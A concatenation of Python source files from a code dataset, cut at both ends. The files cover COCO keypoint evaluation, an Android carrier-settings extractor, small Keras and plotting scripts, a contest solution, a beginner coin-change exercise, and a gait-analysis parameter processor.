CocoDatasetGetScoreData(CocoDataset):\n def __init__(self, root, dataset, data_format, num_joints, get_rescore_data, transform=None,\n target_transform=None, bbox_file=None):\n CocoDataset.__init__(self, root, dataset, data_format, num_joints, get_rescore_data, transform=None,\n target_transform=None, bbox_file=None)\n\n def evaluate(self, cfg, preds, scores, output_dir, tag,\n *args, **kwargs):\n '''\n Perform evaluation on COCO keypoint task\n :param cfg: cfg dictionary\n :param preds: prediction\n :param output_dir: output directory\n :param args: \n :param kwargs: \n :return: \n '''\n res_folder = os.path.join(output_dir, 'results')\n if not os.path.exists(res_folder):\n os.makedirs(res_folder)\n res_file = os.path.join(\n res_folder, 'keypoints_%s_results.json' % (self.dataset+tag))\n\n # preds is a list of: image x person x (keypoints)\n # keypoints: num_joints * 4 (x, y, score, tag)\n kpts = defaultdict(list)\n for idx, _kpts in enumerate(preds):\n img_id = self.ids[idx]\n file_name = self.coco.loadImgs(img_id)[0]['file_name']\n for idx_kpt, kpt in enumerate(_kpts):\n area = (np.max(kpt[:, 0]) - np.min(kpt[:, 0])) * \\\n (np.max(kpt[:, 1]) - np.min(kpt[:, 1]))\n kpt = self.processKeypoints(kpt)\n\n kpts[int(file_name[-16:-4])].append(\n {\n 'keypoints': kpt[:, 0:3],\n 'score': scores[idx][idx_kpt],\n 'image': int(file_name[-16:-4]),\n 'area': area\n }\n )\n\n # rescoring and oks nms\n oks_nmsed_kpts = []\n # image x person x (keypoints)\n for img in kpts.keys():\n # person x (keypoints)\n img_kpts = kpts[img]\n # person x (keypoints)\n # do not use nms, keep all detections\n keep = []\n if len(keep) == 0:\n oks_nmsed_kpts.append(img_kpts)\n else:\n oks_nmsed_kpts.append([img_kpts[_keep] for _keep in keep])\n\n self._write_coco_keypoint_results(\n oks_nmsed_kpts, res_file\n )\n\n if 'test' not in self.dataset:\n self._do_python_keypoint_eval(\n cfg.RESCORE.DATA_FILE, res_file, res_folder\n )\n\n else:\n return {'Null': 0}, 0\n\n def _do_python_keypoint_eval(self, data_file, res_file, res_folder):\n coco_dt = self.coco.loadRes(res_file)\n coco_eval = COCOeval_Rescore_Data(self.coco, coco_dt, 'keypoints')\n coco_eval.params.useSegm = None\n coco_eval.evaluate()\n coco_eval.dumpdataset(data_file)","sub_path":"pose_estimation/lib/dataset/COCODatasetGetScoreData.py","file_name":"COCODatasetGetScoreData.py","file_ext":"py","file_size_in_byte":6216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"511103059","text":"#!/usr/bin/env python3\n\nfrom collections import OrderedDict\nfrom glob import glob\nfrom itertools import product\nimport os.path\nimport sys\nfrom xml.etree import ElementTree as ET\nfrom xml.sax.saxutils import escape, quoteattr\n\nfrom carriersettings_pb2 import CarrierList, CarrierSettings, \\\n MultiCarrierSettings\nfrom vendor.carrierId_pb2 import CarrierList as CarrierIdList\n\npb_path = sys.argv[1]\n\ncarrier_id_list = CarrierIdList()\ncarrier_attribute_map = {}\nwith open('carrier_list.pb', 'rb') as pb:\n carrier_id_list.ParseFromString(pb.read())\nfor carrier_id_obj in carrier_id_list.carrier_id:\n for carrier_attribute in carrier_id_obj.carrier_attribute:\n for carrier_attributes in product(*(\n (s.lower() for s in getattr(carrier_attribute, i) or [''])\n for i in [\n 'mccmnc_tuple', 'imsi_prefix_xpattern', 'spn', 'plmn',\n 'gid1', 'gid2', 'preferred_apn', 'iccid_prefix',\n 'privilege_access_rule',\n ]\n )):\n carrier_attribute_map[carrier_attributes] = \\\n carrier_id_obj.canonical_id\n\ncarrier_list = CarrierList()\nall_settings = {}\nfor filename in glob(os.path.join(pb_path, '*.pb')):\n with open(filename, 'rb') as pb:\n if os.path.basename(filename) == 'carrier_list.pb':\n carrier_list.ParseFromString(pb.read())\n elif os.path.basename(filename) == 'others.pb':\n settings = MultiCarrierSettings()\n settings.ParseFromString(pb.read())\n for setting in settings.setting:\n assert setting.canonicalName not in all_settings\n all_settings[setting.canonicalName] = setting\n else:\n setting = CarrierSettings()\n setting.ParseFromString(pb.read())\n assert setting.canonicalName not in all_settings\n all_settings[setting.canonicalName] = setting\n\n\n# Unfortunately, python processors like xml and lxml, as well as command-line\n# utilities like tidy, do not support the exact style used by AOSP for\n# apns-full-conf.xml:\n#\n# * indent: 2 spaces\n# * attribute indent: 4 spaces\n# * blank lines between elements\n# * attributes after first indented on separate lines\n# * closing tags of multi-line elements on separate, unindented lines\n#\n# Therefore, we build the file without using an XML processor.\n\n\nclass ApnElement:\n def __init__(self, apn, carrier_id):\n self.apn = apn\n self.carrier_id = carrier_id\n self.attributes = OrderedDict()\n self.add_attributes()\n\n def add_attribute(self, key, field=None, value=None):\n if value is not None:\n self.attributes[key] = value\n else:\n if field is None:\n field = key\n if self.apn.HasField(field):\n enum_type = self.apn.DESCRIPTOR.fields_by_name[field].enum_type\n value = getattr(self.apn, field)\n if enum_type is None:\n if isinstance(value, bool):\n self.attributes[key] = str(value).lower()\n else:\n self.attributes[key] = str(value)\n else:\n self.attributes[key] = \\\n enum_type.values_by_number[value].name\n\n def add_attributes(self):\n try:\n self.add_attribute(\n 'carrier_id',\n value=str(carrier_attribute_map[(\n self.carrier_id.mccMnc,\n self.carrier_id.imsi,\n self.carrier_id.spn.lower(),\n '',\n self.carrier_id.gid1.lower(),\n self.carrier_id.gid2.lower(),\n '',\n '',\n '',\n )])\n )\n except KeyError:\n pass\n self.add_attribute('mcc', value=self.carrier_id.mccMnc[:3])\n self.add_attribute('mnc', value=self.carrier_id.mccMnc[3:])\n self.add_attribute('apn', 'value')\n self.add_attribute('proxy')\n self.add_attribute('port')\n self.add_attribute('mmsc')\n self.add_attribute('mmsproxy', 'mmscProxy')\n self.add_attribute('mmsport', 'mmscProxyPort')\n self.add_attribute('user')\n self.add_attribute('password')\n self.add_attribute('server')\n self.add_attribute('authtype')\n self.add_attribute(\n 'type',\n value=','.join(\n apn.DESCRIPTOR.fields_by_name[\n 'type'\n ].enum_type.values_by_number[i].name\n for i in self.apn.type\n ).lower(),\n )\n self.add_attribute('protocol')\n self.add_attribute('roaming_protocol', 'roamingProtocol')\n self.add_attribute('carrier_enabled', 'carrierEnabled')\n self.add_attribute('bearer_bitmask', 'bearerBitmask')\n self.add_attribute('profile_id', 'profileId')\n self.add_attribute('modem_cognitive', 'modemCognitive')\n self.add_attribute('max_conns', 'maxConns')\n self.add_attribute('wait_time', 'waitTime')\n self.add_attribute('max_conns_time', 'maxConnsTime')\n self.add_attribute('mtu')\n mvno = self.carrier_id.WhichOneof('mvno')\n if mvno:\n self.add_attribute(\n 'mvno_type',\n value='gid' if mvno.startswith('gid') else mvno,\n )\n self.add_attribute(\n 'mvno_match_data',\n value=getattr(self.carrier_id, mvno),\n )\n self.add_attribute('apn_set_id', 'apnSetId')\n # No source for integer carrier_id?\n self.add_attribute('skip_464xlat', 'skip464Xlat')\n self.add_attribute('user_visible', 'userVisible')\n self.add_attribute('user_editable', 'userEditable')\n\n\ndef indent(elem, level=0):\n \"\"\"Based on https://effbot.org/zone/element-lib.htm#prettyprint\"\"\"\n i = \"\\n\" + level * \" \"\n if len(elem):\n if not elem.text or not elem.text.strip():\n elem.text = i + \" \"\n if not elem.tail or not elem.tail.strip():\n elem.tail = i\n for elem in elem:\n indent(elem, level + 1)\n if not elem.tail or not elem.tail.strip():\n elem.tail = i\n else:\n if level and (not elem.tail or not elem.tail.strip()):\n elem.tail = i\n\n\ncarrier_config_root = ET.Element('carrier_config_list')\n\nwith open('apns-full-conf.xml', 'w', encoding='utf-8') as f:\n f.write('\\n\\n')\n f.write('\\n\\n')\n\n version_suffix = all_settings['default'].version % 1000000000\n for entry in carrier_list.entry:\n setting = all_settings[entry.canonicalName]\n for apn in setting.apns.apn:\n f.write(' \\n\\n')\n\n carrier_config_element = ET.SubElement(\n carrier_config_root,\n 'carrier_config',\n )\n carrier_config_element.set('mcc', entry.carrierId.mccMnc[:3])\n carrier_config_element.set('mnc', entry.carrierId.mccMnc[3:])\n for field in ['spn', 'imsi', 'gid1', 'gid2']:\n if entry.carrierId.HasField(field):\n carrier_config_element.set(\n field,\n getattr(entry.carrierId, field),\n )\n\n # Add version key composed of canonical name and versions\n carrier_config_subelement = ET.SubElement(\n carrier_config_element,\n 'string'\n )\n carrier_config_subelement.set('name', 'carrier_config_version_string')\n carrier_config_subelement.text = '{}-{}.{}'.format(\n setting.canonicalName,\n setting.version,\n version_suffix\n )\n\n for config in setting.configs.config:\n value_type = config.WhichOneof('value')\n if value_type == 'textValue':\n carrier_config_subelement = ET.SubElement(\n carrier_config_element,\n 'string',\n )\n carrier_config_subelement.set('name', config.key)\n carrier_config_subelement.text = getattr(config, value_type)\n elif value_type == 'intValue':\n carrier_config_subelement = ET.SubElement(\n carrier_config_element,\n 'int',\n )\n carrier_config_subelement.set('name', config.key)\n carrier_config_subelement.set(\n 'value',\n str(getattr(config, value_type)),\n )\n elif value_type == 'longValue':\n carrier_config_subelement = ET.SubElement(\n carrier_config_element,\n 'long',\n )\n carrier_config_subelement.set('name', config.key)\n carrier_config_subelement.set(\n 'value',\n str(getattr(config, value_type)),\n )\n elif value_type == 'boolValue':\n carrier_config_subelement = ET.SubElement(\n carrier_config_element,\n 'boolean',\n )\n carrier_config_subelement.set('name', config.key)\n carrier_config_subelement.set(\n 'value',\n str(getattr(config, value_type)).lower(),\n )\n elif value_type == 'textArray':\n carrier_config_subelement = ET.SubElement(\n carrier_config_element,\n 'string-array',\n )\n carrier_config_subelement.set('name', config.key)\n carrier_config_subelement.set(\n 'num',\n str(len(getattr(config, value_type).item)),\n )\n for value in getattr(config, value_type).item:\n carrier_config_item = ET.SubElement(\n carrier_config_subelement,\n 'item',\n )\n carrier_config_item.set('value', value)\n elif value_type == 'intArray':\n carrier_config_subelement = ET.SubElement(\n carrier_config_element,\n 'int-array',\n )\n carrier_config_subelement.set('name', config.key)\n carrier_config_subelement.set(\n 'num',\n str(len(getattr(config, value_type).item)),\n )\n for value in getattr(config, value_type).item:\n carrier_config_item = ET.SubElement(\n carrier_config_subelement,\n 'item',\n )\n carrier_config_item.set('value', str(value))\n else:\n raise TypeError(\"Unknown value type: {}\".format(value_type))\n\n f.write('\\n')\n\nindent(carrier_config_root)\ncarrier_config_tree = ET.ElementTree(carrier_config_root)\ncarrier_config_tree.write('vendor.xml', encoding='utf-8', xml_declaration=True)\n\n# Test XML parsing.\nET.parse('apns-full-conf.xml')\nET.parse('vendor.xml')\n","sub_path":"carriersettings_extractor.py","file_name":"carriersettings_extractor.py","file_ext":"py","file_size_in_byte":11482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"408958203","text":"from sklearn.svm import LinearSVC, SVC\nfrom sklearn.metrics import accuracy_score, r2_score\nimport numpy as np\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense\n\n#1. data \nx_data = [[0,0],[1,0],[0,1],[1,1]]\ny_data = [0,1,1,0]\n\n#2. model\nmodel = Sequential()\nmodel.add(Dense(4, input_shape=(2,)))\nmodel.add(Dense(20, activation='relu'))\n# model.add(Dense(10, activation='relu'))\nmodel.add(Dense(1, activation='sigmoid'))\n\n#3. training\nmodel.compile(loss='binary_crossentropy', optimizer='adam', metrics=['acc'])\nmodel.fit(x_data, y_data, batch_size=1, epochs=100)\n\n#4. elvaluate, predict\ny_predict = model.predict(x_data)\n\nprint(x_data,\"x_data의 예측결과\",y_predict)\n\n# acc = accuracy_score(y_data, y_predict)\n# print(\"acc: \", acc)\n\nscore = model.evaluate(x_data, y_data)\nprint(\"evaluates: \", score)","sub_path":"ml/m04_xor3_keras2.py","file_name":"m04_xor3_keras2.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"247854220","text":"#!/usr/bin/env python\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pdb\nfrom matplotlib.backends.backend_pdf import PdfPages\n\nz = np.load('mat_240.npy')\n\nplt.rc('text', usetex=True)\nplt.rc('font', family='serif')\n# mat_240 is 50Hz\nfig, ax1 = plt.subplots()\n# pdb.set_trace()\nt = np.linspace(0,z.shape[0]/100,z.shape[0])\nax1.plot(t, 1./z[:,1]*30*1e6,'.')\nplt.ylabel('RPM')\nplt.xlabel('Time [s]')\nplt.grid()\nax2 = ax1.twinx()\nax2.plot(t, z[:,0],'r.-')\nplt.ylabel('cmd')\nplt.xlim([0, 68])\n# z = np.polyfit(rpm,z[:,2],2)\n# rpm_fit = np.linspace(2000,5500,100)\n# p = np.poly1d(z)\n# print z\n# plt.plot(rpm_fit,p(rpm_fit),'--r')\nplt.tight_layout()\npp = PdfPages('response.pdf')\npp.savefig(fig)\nfig.savefig('response.png')\npp.close()\nplt.show()\n","sub_path":"post_proc_mat.py","file_name":"post_proc_mat.py","file_ext":"py","file_size_in_byte":750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"173382465","text":"import sys\nsys.setrecursionlimit(1 << 25)\nread = sys.stdin.readline\nra = range\nenu = enumerate\n\n\ndef exit(*argv, **kwarg):\n print(*argv, **kwarg)\n sys.exit()\n\n\ndef mina(*argv, sub=1): return list(map(lambda x: x - sub, argv))\n# 受け渡されたすべての要素からsubだけ引く.リストを*をつけて展開しておくこと\n\n\ndef a_int(): return int(read())\n\n\ndef ints(): return list(map(int, read().split()))\n\n\ndef read_col(H):\n '''H is number of rows\n A列、B列が与えられるようなとき\n ex1)A,B=read_col(H) ex2) A,=read_col(H) #一列の場合'''\n ret = []\n for _ in range(H):\n ret.append(list(map(int, read().split())))\n return tuple(map(list, zip(*ret)))\n\n\ndef read_tuple(H):\n '''H is number of rows'''\n ret = []\n for _ in range(H):\n ret.append(tuple(map(int, read().split())))\n return ret\n\n\ndef read_matrix(H):\n '''H is number of rows'''\n ret = []\n for _ in range(H):\n ret.append(list(map(int, read().split())))\n return ret\n # return [list(map(int, read().split())) for _ in range(H)] # 内包表記はpypyでは遅いため\n\n\nMOD = 10**9 + 7\nINF = 2**31 # 2147483648 > 10**9\n# default import\nfrom collections import defaultdict, Counter, deque\nfrom operator import itemgetter, xor, add\nfrom itertools import product, permutations, combinations\nfrom bisect import bisect_left, bisect_right # , insort_left, insort_right\nfrom functools import reduce\n\nX, K, D = ints()\n# 全部正からスタートで考えてok\nif X < 0:\n X = -X\n\n# 反復横跳びしない場合\nif X >= K * D:\n exit(X - K * D)\n\n# 反復横跳びする場合\nXX = X % D # 一番0に近い右側\nK -= X // D # 残りの回数\n# print(XX, K)\n\nprint(XX if K & 1 == 0 else -(XX - D))\n","sub_path":"contests/abc175/c/c.py","file_name":"c.py","file_ext":"py","file_size_in_byte":1760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"371336664","text":"\"\"\"\nUser enters cost, amount of money given. Calculate change in quarters, dimes, nickels, pennies\n\"\"\"\n\n\ncost = float(input(\"What is the cost of the product? \"))\ntender = float(input(\"How much money are you giving to buy the product? \"))\n\nwhile cost < tender:\n print(\"You still owe $\" + \"%.2f\" % (cost - tender))\n\nchange = (cost - tender) * 100\nquart = 0\ndime = 0\nnickel = 0\npenn = 0\n\nif change >= 25:\n quart = int(change / 25)\n change = change % 25\n \nif change >= 10:\n dime = int(change / 10)\n change = change % 10\n \nif change >= 5:\n nickel = int(change / 5)\n change = change % 5\n \nif change >= 1:\n penn = change\n","sub_path":"Numbers/change.py","file_name":"change.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"449752853","text":"import pandas as pd\nimport numpy as np\nfrom numpy.core.umath_tests import inner1d\nimport matplotlib.pyplot as plt\nfrom const import TRIAL_NAMES, PLATE_SAMPLE_RATE, MOCAP_SAMPLE_RATE, HAISHENG_SENSOR_SAMPLE_RATE, \\\n FOOT_SENSOR_BROKEN_SUBS\nimport xlrd\nfrom numpy.linalg import norm\nfrom StrikeOffDetectorIMU import StrikeOffDetectorIMU, StrikeOffDetectorIMUFilter\n\n\nclass ParamProcessor:\n def __init__(self, sub_name, readme_xls, trials, plot_strike_off=False, check_steps=False,\n initialize_100Hz=True, initialize_200Hz=True):\n self._sub_name = sub_name\n readme_sheet = xlrd.open_workbook(readme_xls).sheet_by_index(0)\n self.__weight = readme_sheet.cell_value(17, 1) # in kilos\n self.__height = readme_sheet.cell_value(18, 1) # in meters\n self.__plot_strike_off = plot_strike_off\n self.__check_steps = check_steps\n self.__initialize_100Hz = initialize_100Hz\n self.__initialize_200Hz = initialize_200Hz\n\n self._trials = list(trials)\n # remove static trials\n if TRIAL_NAMES[0] in self._trials:\n self._trials.remove(TRIAL_NAMES[0])\n\n def start_initalization(self, path):\n print('\\n' + self._sub_name)\n fre_100_path = path + '\\\\' + self._sub_name + '\\\\100Hz\\\\'\n fre_200_path = path + '\\\\' + self._sub_name + '\\\\200Hz\\\\'\n\n if self.__initialize_100Hz:\n self.static_data_df = pd.read_csv(fre_100_path + TRIAL_NAMES[0] + '.csv', index_col=False)\n for trial_name in self._trials:\n print('\\n' + trial_name + ' trial')\n self._current_trial = trial_name\n # initialize 100 Hz parameter\n print('100Hz')\n self._current_fre = 100\n gait_data_100_df = pd.read_csv(fre_100_path + trial_name + '.csv', index_col=False)\n trial_param_df_100 = self.init_trial_params(gait_data_100_df, HAISHENG_SENSOR_SAMPLE_RATE)\n self.__save_data(fre_100_path, trial_name, trial_param_df_100)\n # plt.show()\n\n if self.__initialize_200Hz:\n self.static_data_df = pd.read_csv(fre_200_path + TRIAL_NAMES[0] + '.csv', index_col=False)\n for trial_name in self._trials:\n print('\\n' + trial_name + ' trial')\n self._current_trial = trial_name\n # initialize 200 Hz parameter\n print('200Hz')\n self._current_fre = 200\n gait_data_200_df = pd.read_csv(fre_200_path + trial_name + '.csv', index_col=False)\n trial_param_df_200 = self.init_trial_params(gait_data_200_df, MOCAP_SAMPLE_RATE)\n self.__save_data(fre_200_path, trial_name, trial_param_df_200)\n # plt.show()\n\n @staticmethod\n def resample_steps(steps_1000, sample_fre):\n ratio = int(1000 / sample_fre)\n steps_resampled = []\n for step in steps_1000:\n step_resampled = [round(step[0] / ratio), round(step[1] / ratio)]\n steps_resampled.append(step_resampled)\n return steps_resampled\n\n def init_trial_params(self, gait_data_df, sensor_sampling_rate):\n # get strikes and offs\n l_strikes, l_offs = self.get_strike_off(gait_data_df, plate=1)\n r_strikes, r_offs = self.get_strike_off(gait_data_df, plate=2)\n self.check_strikes_offs(-gait_data_df['f_1_z'], l_strikes, l_offs, self._current_trial + ' left foot')\n self.check_strikes_offs(-gait_data_df['f_2_z'], r_strikes, r_offs, self._current_trial + ' right foot')\n\n # get steps\n l_steps = self.get_legal_steps(l_strikes, l_offs, 'l', gait_data_df=gait_data_df)\n r_steps = self.get_legal_steps(r_strikes, r_offs, 'r', gait_data_df=gait_data_df)\n\n # get FPA and trunk angles\n FPA_all = self.get_FPA_all(gait_data_df) # FPA of all the samples\n trunk_ml_angle, trunk_ap_angle = self.get_trunk_angles(gait_data_df)\n # self.check_trunk_angles(trunk_ml_angle, trunk_ap_angle)\n param_data = np.column_stack([trunk_ap_angle, trunk_ml_angle, l_strikes, r_strikes, l_offs, r_offs, FPA_all])\n param_data_df = pd.DataFrame(param_data)\n param_data_df.columns = ['trunk_ap_angle', 'trunk_ml_angle', 'l_strikes', 'r_strikes', 'l_offs', 'r_offs',\n 'l_FPA', 'r_FPA']\n param_data_df.insert(0, 'marker_frame', gait_data_df['marker_frame'])\n\n if self._sub_name not in FOOT_SENSOR_BROKEN_SUBS:\n # get strikes and offs from IMU data\n estimated_strikes_lfilter, estimated_offs_lfilter = self.get_strike_off_from_imu_lfilter(\n gait_data_df, param_data_df, sensor_sampling_rate, check_strike_off=True,\n plot_the_strike_off=self.__plot_strike_off)\n param_data_df.insert(len(param_data_df.columns), 'strikes_IMU_lfilter', estimated_strikes_lfilter)\n param_data_df.insert(len(param_data_df.columns), 'offs_IMU_lfilter', estimated_offs_lfilter)\n l_FPA_steps = self.get_FPA_steps(gait_data_df, FPA_all[:, 0], l_steps)\n r_FPA_steps = self.get_FPA_steps(gait_data_df, FPA_all[:, 1], r_steps)\n self.insert_param_data(param_data_df, l_FPA_steps, 'l_FPA_steps')\n self.insert_param_data(param_data_df, r_FPA_steps, 'r_FPA_steps')\n\n return param_data_df\n\n @staticmethod\n def check_loading_rate_all(l_loading_rate):\n plt.figure()\n plt.plot(l_loading_rate)\n\n @staticmethod\n def get_strike_off(gait_data_df, plate, threshold=20, comparison_len=4):\n if plate == 1:\n force = gait_data_df[['f_1_x', 'f_1_y', 'f_1_z']].values\n elif plate == 2:\n force = gait_data_df[['f_2_x', 'f_2_y', 'f_2_z']].values\n else:\n raise ValueError('Wrong plate number')\n\n force_norm = norm(force, axis=1)\n data_len = force_norm.shape[0]\n strikes, offs = np.zeros(data_len, dtype=np.int8), np.zeros(data_len, dtype=np.int8)\n i_sample = 0\n # go to the first stance phase\n while i_sample < data_len and force_norm[i_sample] < 300:\n i_sample += 1\n swing_phase = False\n while i_sample < data_len - comparison_len:\n # for swing phase\n if swing_phase:\n while i_sample < data_len - comparison_len:\n i_sample += 1\n lower_than_threshold_num = len(\n np.where(force_norm[i_sample:i_sample + comparison_len] < threshold)[0])\n if lower_than_threshold_num >= round(0.8 * comparison_len):\n continue\n else:\n strikes[i_sample + round(0.8 * comparison_len) - 1] = 1\n swing_phase = False\n break\n # for stance phase\n else:\n while i_sample < data_len and force_norm[i_sample] > 300: # go to the next stance phase\n i_sample += 1\n while i_sample < data_len - comparison_len:\n i_sample += 1\n lower_than_threshold_num = len(\n np.where(force_norm[i_sample:i_sample + comparison_len] < threshold)[0])\n if lower_than_threshold_num >= round(0.8 * comparison_len):\n offs[i_sample + round(0.2 * comparison_len)] = 1\n swing_phase = True\n break\n return strikes, offs\n\n def get_strike_off_1000(self, gait_data_df, plate_data_1000, sensor_sampling_rate, threshold=20):\n force = plate_data_1000[['f_1_x', 'f_1_y', 'f_1_z']].values\n force_norm = norm(force, axis=1)\n strikes, offs = self.get_raw_strikes_offs(force_norm, threshold, comparison_len=20)\n self.check_strikes_offs(force_norm, strikes, offs)\n\n # distribute strikes offs to left and right foot\n data_len = len(strikes)\n ratio = sensor_sampling_rate / PLATE_SAMPLE_RATE\n\n l_strikes, r_strikes = np.zeros(data_len), np.zeros(data_len)\n l_offs, r_offs = np.zeros(data_len), np.zeros(data_len)\n for i_sample in range(data_len):\n if strikes[i_sample] == 1:\n l_heel_y = gait_data_df.loc[round(i_sample * ratio), 'LFCC_y']\n r_heel_y = gait_data_df.loc[round(i_sample * ratio), 'RFCC_y']\n if l_heel_y == 0 or r_heel_y == 0:\n raise ValueError('Marker missing')\n if l_heel_y > r_heel_y:\n l_strikes[i_sample] = 1\n else:\n r_strikes[i_sample] = 1\n if offs[i_sample] == 1:\n l_heel_y = gait_data_df.loc[round(i_sample * ratio), 'LFCC_y']\n r_heel_y = gait_data_df.loc[round(i_sample * ratio), 'RFCC_y']\n if l_heel_y == 0 or r_heel_y == 0:\n raise ValueError('Marker missing')\n if l_heel_y < r_heel_y:\n l_offs[i_sample] = 1\n else:\n r_offs[i_sample] = 1\n return l_strikes, r_strikes, l_offs, r_offs\n\n def check_strikes_offs(self, force_norm, strikes, offs, title=''):\n strike_indexes = np.where(strikes == 1)[0]\n off_indexes = np.where(offs == 1)[0]\n data_len = min(strike_indexes.shape[0], off_indexes.shape[0])\n\n # check strike off by checking if each strike is followed by a off\n strike_off_detection_flaw = False\n if strike_indexes[0] > off_indexes[0]:\n diffs_0 = np.array(strike_indexes[:data_len]) - np.array(off_indexes[:data_len])\n diffs_1 = np.array(strike_indexes[:data_len - 1]) - np.array(off_indexes[1:data_len])\n else:\n diffs_0 = np.array(off_indexes[:data_len]) - np.array(strike_indexes[:data_len])\n diffs_1 = np.array(off_indexes[:data_len - 1]) - np.array(strike_indexes[1:data_len])\n if np.min(diffs_0) < 0 or np.max(diffs_1) > 0:\n strike_off_detection_flaw = True\n\n try:\n if strike_off_detection_flaw:\n raise ValueError('For trial {trial_name}, strike off detection result are wrong.'.format(\n trial_name=self._current_trial))\n if self.__plot_strike_off:\n raise ValueError\n except ValueError as value_error:\n if len(value_error.args) != 0:\n print(value_error.args[0])\n plt.figure()\n plt.plot(force_norm)\n plt.grid()\n plt.plot(strike_indexes, force_norm[strike_indexes], 'g*')\n plt.plot(off_indexes, force_norm[off_indexes], 'gx')\n plt.title(title)\n\n def get_trunk_angles(self, gait_data_df):\n C7 = gait_data_df[['C7_x', 'C7_y', 'C7_z']].values\n l_PSIS = gait_data_df[['LIPS_x', 'LIPS_y', 'LIPS_z']].values\n r_PSIS = gait_data_df[['RIPS_x', 'RIPS_y', 'RIPS_z']].values\n middle_PSIS = (l_PSIS + r_PSIS) / 2\n vertical_vector = C7 - middle_PSIS\n trunk_ml_angle = 180 / np.pi * np.arctan(vertical_vector[:, 0] / vertical_vector[:, 2])\n trunk_ap_angle = 180 / np.pi * np.arctan(vertical_vector[:, 1] / vertical_vector[:, 2])\n return trunk_ml_angle, trunk_ap_angle\n\n @staticmethod\n def check_trunk_angles(trunk_ml_angle, trunk_ap_angle):\n plt.figure()\n plt.plot(trunk_ml_angle)\n plt.title('trunk swag')\n plt.figure()\n plt.plot(trunk_ap_angle)\n plt.title('trunk inclination')\n\n @staticmethod\n def get_projected_points(p0, p1, p2):\n \"\"\"\n Project one point on a line in a 2D space\n :param p0: Coordinates of the toe\n :param p1: Coordinates of the heel\n :param p2: Coordinates of the COP\n :return:\n \"\"\"\n [a0, b0] = p0\n [a1, b1] = p1\n [a2, b2] = p2\n the_mat = np.matrix([[a0 - a1, b0 - b1],\n [b1 - b0, a0 - a1]])\n the_array = np.array([a0 * a2 - a1 * a2 + b0 * b2 - b1 * b2, a0 * b1 - a1 * b1 - b0 * a1 + a1 * b1])\n projected_point = np.matmul(the_mat.I, the_array.T)\n return projected_point\n\n @staticmethod\n def __save_data(folder_path, trial_name, data_all_df):\n # save param data\n data_file_str = '{folder_path}\\\\param_of_{trial_name}.csv'.format(\n folder_path=folder_path, trial_name=trial_name)\n data_all_df.to_csv(data_file_str, index=False)\n\n def get_strike_off_from_imu(self, gait_data_df, param_data_df, sensor_sampling_rate, check_strike_off=True,\n plot_the_strike_off=False):\n if sensor_sampling_rate == HAISHENG_SENSOR_SAMPLE_RATE:\n my_detector = StrikeOffDetectorIMU(self._current_trial, gait_data_df, param_data_df, 'r_foot',\n HAISHENG_SENSOR_SAMPLE_RATE)\n strike_delay, off_delay = 4, 4 # delay from the peak\n elif sensor_sampling_rate == MOCAP_SAMPLE_RATE:\n my_detector = StrikeOffDetectorIMU(self._current_trial, gait_data_df, param_data_df, 'l_foot',\n MOCAP_SAMPLE_RATE)\n strike_delay, off_delay = 8, 6 # delay from the peak\n else:\n raise ValueError('Wrong sensor sampling rate value')\n estimated_strike_indexes, estimated_off_indexes = my_detector.get_walking_strike_off(strike_delay, off_delay)\n if plot_the_strike_off:\n my_detector.show_IMU_data_and_strike_off(estimated_strike_indexes, estimated_off_indexes)\n data_len = gait_data_df.shape[0]\n estimated_strikes, estimated_offs = np.zeros([data_len]), np.zeros([data_len])\n estimated_strikes[estimated_strike_indexes] = 1\n estimated_offs[estimated_off_indexes] = 1\n if check_strike_off:\n my_detector.true_esti_diff(estimated_strike_indexes, 'strikes')\n my_detector.true_esti_diff(estimated_off_indexes, 'offs')\n return estimated_strikes, estimated_offs\n\n def get_strike_off_from_imu_lfilter(self, gait_data_df, param_data_df, sensor_sampling_rate, check_strike_off=True,\n plot_the_strike_off=False):\n \"\"\"\n In the filter, lfilter was used so there are delays in the detected events (about 50 samples)\n \"\"\"\n if sensor_sampling_rate == HAISHENG_SENSOR_SAMPLE_RATE:\n my_detector = StrikeOffDetectorIMUFilter(self._current_trial, gait_data_df, param_data_df, 'r_foot',\n HAISHENG_SENSOR_SAMPLE_RATE)\n strike_delay, off_delay = 6, 5 # delay from the peak\n elif sensor_sampling_rate == MOCAP_SAMPLE_RATE:\n my_detector = StrikeOffDetectorIMUFilter(self._current_trial, gait_data_df, param_data_df, 'l_foot',\n MOCAP_SAMPLE_RATE)\n strike_delay, off_delay = 10, 10 # delay from the peak\n else:\n raise ValueError('Wrong sensor sampling rate value')\n estimated_strike_indexes, estimated_off_indexes = my_detector.get_walking_strike_off(strike_delay, off_delay)\n if plot_the_strike_off:\n my_detector.show_IMU_data_and_strike_off(estimated_strike_indexes, estimated_off_indexes)\n data_len = gait_data_df.shape[0]\n estimated_strikes, estimated_offs = np.zeros([data_len]), np.zeros([data_len])\n estimated_strikes[estimated_strike_indexes] = 1\n estimated_offs[estimated_off_indexes] = 1\n if check_strike_off:\n my_detector.true_esti_diff(estimated_strike_indexes, 'strikes')\n my_detector.true_esti_diff(estimated_off_indexes, 'offs')\n return estimated_strikes, estimated_offs\n\n # FPA of all the samples\n def get_FPA_all(self, gait_data_df):\n l_toe = gait_data_df[['LFM2_x', 'LFM2_y', 'LFM2_z']].values\n l_heel = gait_data_df[['LFCC_x', 'LFCC_y', 'LFCC_z']].values\n\n forward_vector = l_toe - l_heel\n left_FPAs = - 180 / np.pi * np.arctan2(forward_vector[:, 0], forward_vector[:, 1])\n\n r_toe = gait_data_df[['RFM2_x', 'RFM2_y', 'RFM2_z']].values\n r_heel = gait_data_df[['RFCC_x', 'RFCC_y', 'RFCC_z']].values\n\n forward_vector = r_toe - r_heel\n right_FPAs = 180 / np.pi * np.arctan2(forward_vector[:, 0], forward_vector[:, 1])\n\n return np.column_stack([left_FPAs, 